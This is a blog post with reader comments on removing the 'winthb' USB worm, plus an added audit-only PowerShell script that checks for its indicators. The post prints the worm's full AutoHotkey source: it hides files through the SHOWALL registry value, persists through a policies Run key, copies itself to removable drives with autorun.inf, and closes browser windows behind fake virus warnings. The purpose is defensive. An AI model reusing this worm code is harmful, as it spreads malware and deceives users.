winthb is a virus program that recently came to my system from a USB flash device. It hides hidden folders completely, copies an autorun.inf file to the C: drive and recreates it whenever we delete it. The icon of the C: drive changes to something like the one shown below.
The virus program also has the symptoms listed below:
1. When we try to search for orkut in Google, it displays an error message "WARNING,orkut is sending viruses to your pc. To protect your pc close this window ,orkut is infected by jammer worm" and also plays a sound (win.mp3).
2. When we try YouTube: "WARNING,Dangerous script send by youtube, Windows system files damage if this script run".
3. On my system Mozilla Firefox was disabled when the thb fellow arrived; Firefox showed "File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus".
How to remove winthb virus
Go to Start > Run, type temp and press Enter, then clear that directory. Do the same with %temp% and clear it too.
As a first step, when you boot into Windows press ALT+CTRL+DEL and stop the processes win.exe and avgs.exe if they are running. Go to Run, type regedit and press Enter; the Registry Editor window will open. [1] Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL. The program sets CheckedValue to 0; set it back to 1.
Now all the hidden files can be made visible: go to Tools > Folder Options > View and select "Show hidden files and folders".
Now search for avgs.exe with the Windows search tool. If a file is found, note its path. Do not double-click any drive to open it, because most of these viruses get into the system when we double-click the drive, which runs its autorun.inf file. If you have to open a drive, type its path in the address bar instead. I found the files in my C:\windows\system32\win.dll\
The folder icon for win.dll did not appear as a normal folder icon; it was the icon for DLL files, and the folder was hidden. So do not run any of the virus files while doing this. If you do, you will not see the hidden files any more and you will have to repeat step [1]. Find the folder and delete it, and find any file named win.exe or avgs.exe. The folder C:\windows\system32\win.dll\ contained these files:
win.exe
avgs.exe
Desktop.ini
std.txt
Drivelist.txt
Icon.ico
reproduce.txt
win.mp3
thb.ico
Dll.ico
script1.txt
The virus scripts look like the ones below (each shown under its file name):
std.txt
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run D:\RECYCLE\win.exe D:\RECYCLE\script1.txt
Run D:\RECYCLE\avgs.exe D:\RECYCLE\reproduce.txt
reproduce.txt
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,D:\RECYCLE\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return
reproduce:
Loop %ArrayCount%
{
element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,D:\RECYCLE\reg.bkp,%element%:\,1
}
}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,D:\RECYCLE\win.exe D:\RECYCLE\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,D:\RECYCLE\win.exe D:\RECYCLE\std.txt
ifnotexist,c:\thb.ico
ifnotexist,c:\autorun.inf
filedelete,c:\autorun.inf
Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\thb.ico,c:\
Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\autorun.inf,c:\
return
script1.txt
#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus `r`r ,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
}
return
What the program does on the system:
- Creates c:\windows\system32\win.dll\svchost.exe
- Creates folder C:\WINDOWS\system32\win.dll
- Creates folder C:\WINDOWS\system32\win.dll\reg.bkp
- Copies file c:\docume~1\user\locals~1\temp\winthb\win.exe to c:\windows\system32\win.dll\win.exe
- Copies file c:\docume~1\user\locals~1\temp\winthb\avgs.exe to c:\windows\system32\win.dll\avgs.exe
- Copies file c:\docume~1\user\locals~1\temp\winthb\drivelist.txt to c:\windows\system32\win.dll\drivelist.txt
- Copies file c:\docume~1\user\locals~1\temp\winthb\win.mp3 to c:\windows\system32\win.dll\win.mp3
- Copies file c:\docume~1\user\locals~1\temp\winthb\Icon.ico to c:\windows\system32\win.dll\Icon.ico
- Copies file c:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\windows\system32\win.dll\thb.ico
- Copies file c:\docume~1\user\locals~1\temp\winthb\DLL.ico to c:\windows\system32\win.dll\DLL.ico
- Deletes c:\autorun.inf
- Copies file c:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\thb.ico
- Copies file c:\docume~1\user\locals~1\temp\winthb\autorun.inf to c:\autorun.inf
After all these things I found a copy of the thb files in my D:\RECYCLE folder. It looked like RECYCLER but without the R at the end. Clear that also. I do not know whether the script has any other effects; if you find any, feel free to comment. Thanks.
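As an added example that is not part of the original post, the following PowerShell script checks an affected machine for the indicators described above: the two processes, the SHOWALL CheckedValue, the policies\Explorer\Run\winlogon persistence value that reproduce.txt keeps rewriting, the dropped folders and files, the RECYCLE copy at the root of each drive, and the prefetch entries a comment below mentions. It assumes an elevated PowerShell prompt and only reports; removal remains the manual steps given above.

```powershell
# Added example (not from the original post): audit-only check for the
# winthb indicators described above. Assumes an elevated PowerShell prompt
# on the affected machine. It reports findings and deletes nothing.
$findings = @()

# 1. Processes the post says to stop
foreach ($name in 'win', 'avgs') {
    foreach ($proc in (Get-Process -Name $name -ErrorAction SilentlyContinue)) {
        $findings += "Running process: $($proc.ProcessName) (PID $($proc.Id)) $($proc.Path)"
    }
}

# 2. Explorer hidden-files switch that std.txt forces to 0 (expected 1)
$showAll = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'
$checked = (Get-ItemProperty -Path $showAll -Name CheckedValue -ErrorAction SilentlyContinue).CheckedValue
if ($checked -ne 1) { $findings += "SHOWALL\CheckedValue is '$checked' (expected 1)" }

# 3. Persistence value that reproduce.txt rewrites every 5 seconds
$runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run'
$winlogon = (Get-ItemProperty -Path $runKey -Name winlogon -ErrorAction SilentlyContinue).winlogon
if ($winlogon) { $findings += "Persistence: policies\Explorer\Run\winlogon = '$winlogon'" }

# 4. Dropped folders and files named in the post
$paths = @(
    "$env:SystemRoot\system32\win.dll",   # a hidden folder, not a real DLL
    'C:\autorun.inf',
    'C:\thb.ico',
    "$env:TEMP\winthb"
)
# The RECYCLE copy (no trailing R) was seen on D:; check the root of every drive
foreach ($drive in (Get-PSDrive -PSProvider FileSystem)) {
    $paths += Join-Path $drive.Root 'RECYCLE'
}
foreach ($p in $paths) {
    if (Test-Path -LiteralPath $p) { $findings += "Exists: $p" }
}

# 5. Prefetch entries (suggested in a comment) show the binaries have executed
$pf = Get-ChildItem "$env:SystemRoot\Prefetch" -Filter '*.pf' -ErrorAction SilentlyContinue
foreach ($f in $pf) {
    if ($f.Name -match '^(WIN|AVGS)\.EXE-') { $findings += "Prefetch: $($f.Name)" }
}

if ($findings.Count -eq 0) { 'No winthb indicators found.' } else { $findings }
```

Because reproduce.txt rewrites the winlogon value and autorun.inf on a timer, stop win.exe and avgs.exe before trusting a clean result for items 2 to 4.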
9 comments:
Thank you Mr. Thank you very much.
It helped me.
thanks mannn it helped me also!!!
Man, hats off to you, a genius... this worm has been pissing me off for ages... A BIG THANK YOU
wow nice article.. btw what language are these scripts?
Thank you man... Thank you very much. I suffered so much from this virus.
@Vivek
The language is clearly AutoHotKey scripting, which is an open source scripting language for automation and macro creation in Windows. It is very similar to the AutoIt scripting language.
Regards
Helper
thanks a ton dude...
Also, you might want to delete the prefetch files of win.exe, avgs.exe etc. from your prefetch folder: c:\windows\prefetch
thanks for the information Mr sk
also thanks for the comments
Thank you so much for this valuable information.